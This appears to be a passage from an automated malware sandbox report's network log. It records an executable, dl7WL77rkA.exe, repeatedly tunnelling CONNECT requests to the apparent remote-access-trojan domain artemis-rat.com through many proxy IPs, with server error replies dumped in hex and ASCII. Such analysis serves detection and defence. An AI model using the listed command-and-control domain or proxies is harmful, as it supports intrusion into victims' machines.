                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.834003925 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Content-Length: 4872
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet"> <style type="text/css"> body { height: 100%; font-family: Roboto, Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff;


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1459192.168.2.549816104.238.111.107562253876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.545291901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1460192.168.2.55394851.222.241.8629163876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.545353889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1461192.168.2.55385860.12.168.11490023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.547246933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.934250116 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 03:09:26 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1462192.168.2.553846103.83.36.156783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.547652960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1463192.168.2.553544162.214.121.173629763876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.547802925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.108063936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796526909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1464192.168.2.553537185.49.31.20780813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.580424070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1465192.168.2.55388047.243.114.19281803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.583194017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1466192.168.2.55247434.87.84.105803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.583194017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.772639036 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 532
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 69 74 75 6b 40 6d 79 63 61 73 68 62 61 63 6b 2e 63 6f 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at pituk@mycashback.co to inform them of the time this e
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.772650003 CET172INData Raw: 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20
                                                                                                                                                                                                                                                            Data Ascii: rror occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1467192.168.2.553946133.18.234.13803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.586757898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.860979080 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                                                                                                                                                                                                                                            Data Ascii: Backend not available


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1468192.168.2.55402038.54.101.25431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.587553978 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.767282963 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.692897081 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.752516985 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.893060923 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.245434999 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.693183899 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.100889921 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:55.916846991 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1469192.168.2.554047104.16.106.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.588047981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.742523909 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1470192.168.2.554053104.25.230.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.591784954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.751276016 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1471192.168.2.55393645.120.178.19710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.596846104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1472192.168.2.554008192.210.228.28156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.597479105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1473192.168.2.55250251.161.131.84258433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.642155886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1474192.168.2.55399785.25.177.53576993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.650489092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389478922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405383110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.405278921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092756987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.889508963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.702457905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
